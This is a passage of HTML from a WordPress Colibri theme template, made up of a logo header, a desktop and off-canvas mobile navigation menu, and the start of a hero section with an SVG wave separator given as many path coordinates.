class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path 